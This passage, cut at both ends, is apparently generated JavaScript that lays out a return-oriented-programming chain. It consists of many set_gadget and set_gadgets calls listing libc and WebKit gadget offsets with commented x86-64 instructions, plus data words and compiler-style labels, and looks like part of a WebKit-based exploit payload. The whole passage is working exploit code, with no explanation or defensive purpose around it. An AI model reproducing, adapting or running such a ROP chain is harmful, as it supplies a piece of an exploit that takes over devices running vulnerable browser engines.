0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11847: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L11849: ropchain+537656, //L11848 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+296568, //__ntoa_long_long //L11848: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967216, 4294967295]); // -0x50 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+537728, //L11850 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11850: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11852: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+537808, //L11854 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11854: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+541896, //L11853 //L11744: libc_base+764760, //pop rsi ropchain+537872, //L11856 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11856: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11858: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+537992, //L11861 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+537976, //L11859 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11859: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L11861: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+538168, //L11864 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+538184, //L11865 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+538136, //L11862 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+538152, //L11863 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11862: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11863: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11864: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11865: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+538280, //L11867 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+538264, //L11866 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11866: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11867: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+538360, //L11868 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11868: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11870: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+538480, //L11873 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi 
ropchain+538464, //L11871 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11871: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11873: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+538656, //L11876 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+538672, //L11877 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+538624, //L11874 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+538640, //L11875 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11874: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11875: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11876: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11877: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+538768, //L11879 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+538752, //L11878 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11878: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11879: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+538848, //L11880 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11880: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11882: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi 
libc_base+764760, //pop rsi ropchain+538968, //L11885 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+538952, //L11883 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11883: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11885: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+539144, //L11888 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+539160, //L11889 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+539112, //L11886 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+539128, //L11887 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11886: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L11887: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11888: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11889: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+539256, //L11891 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+539240, //L11890 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L11890: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11891: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+539352, //L11893 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11892: 
db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L11893: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11894: db([16, 0]); // 0x10 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+539472, //L11896 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+539456, //L11895 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11895: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11896: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L11897: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11898: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+539640, //L11899 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11899: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11901: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+539760, //L11904 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+539744, //L11902 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11902: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11904: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+539920, //L11908 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+539872, //L11905 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+539888, //L11906 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11905: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11906: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11907: db([8, 0]); // 0x8 set_gadget(libc_base+759608,); //pop rax //L11908: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+539976, //L11909 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11909: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11911: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+540096, //L11912 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+540112, //L11914 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11912: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11914: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+540256, //L11917 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+540224, //L11915 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+540240, //L11916 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11915: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11916: db([0, 0]); // 0x0 
set_gadget(libc_base+759608,); //pop rax //L11917: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+540336, //L11918 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11918: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11920: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+540456, //L11923 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+540440, //L11921 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11921: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11923: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+540600, //L11926 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+540568, //L11924 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+540584, //L11925 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11924: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11925: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11926: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+540680, //L11927 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11927: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11929: db([4294967272, 4294967295]); 
// -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+540800, //L11932 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+540784, //L11930 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11930: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11932: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+540944, //L11935 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+540912, //L11933 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+540928, //L11934 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11933: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11934: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11935: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+541024, //L11936 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11936: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11938: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+541144, //L11941 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+541128, //L11939 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11939: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11941: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, 
[rdi] libc_base+764760, //pop rsi ropchain+541288, //L11944 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+541256, //L11942 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+541272, //L11943 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11942: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11943: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11944: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+541368, //L11945 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11945: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11947: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+541488, //L11950 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+541472, //L11948 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11948: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11950: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+541632, //L11953 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+541600, //L11951 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+541616, //L11952 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11951: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11952: db([0, 
0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11953: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L11955: ropchain+541736, //L11954 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+275424, //__ntoa_long //L11954: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967216, 4294967295]); // -0x50 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+541808, //L11956 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11956: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11958: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+541888, //L11959 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11959: db([0, 0]); // 0x0 //L11853: set_gadgets([ libc_base+764760, //pop rsi ropchain+541936, //L11961 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11961: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11963: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+542056, //L11966 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+542040, //L11964 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11964: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11966: db([0, 0]); // 0x0 
set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+542200, //L11969 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+542168, //L11967 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+542184, //L11968 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11967: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11968: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11969: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+542288, //L11971 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L11970: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L11971: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+542344, //L11972 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11972: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11974: db([40, 0]); // 0x28 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+542424, //L11976 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11976: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+782311, //pop rsp ropchain+548864, //L10599 //L8576: libc_base+764760, //pop rsi ropchain+542520, //L11977 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 
libc_base+763368 //pop rcx ]); //L11977: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11979: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+542640, //L11982 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+542624, //L11980 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L11980: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11982: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+542784, //L11985 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+542752, //L11983 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+542768, //L11984 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11983: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11984: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11985: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+542864, //L11986 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11986: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11988: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+542984, //L11991 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+542968, //L11989 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); 
//L11989: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11991: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+543128, //L11994 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+543096, //L11992 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+543112, //L11993 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L11992: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L11993: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L11994: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+543216, //L11996 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L11995: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L11996: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+543272, //L11997 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L11997: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L11999: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+543352, //L12001 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12001: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, 
rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+543464, //L12002 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L12002: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L12004: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+543584, //L12007 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+543568, //L12005 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L12005: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12007: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+543728, //L12010 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+543696, //L12008 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+543712, //L12009 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L12008: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L12009: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L12010: db([0, 0]); // 0x0 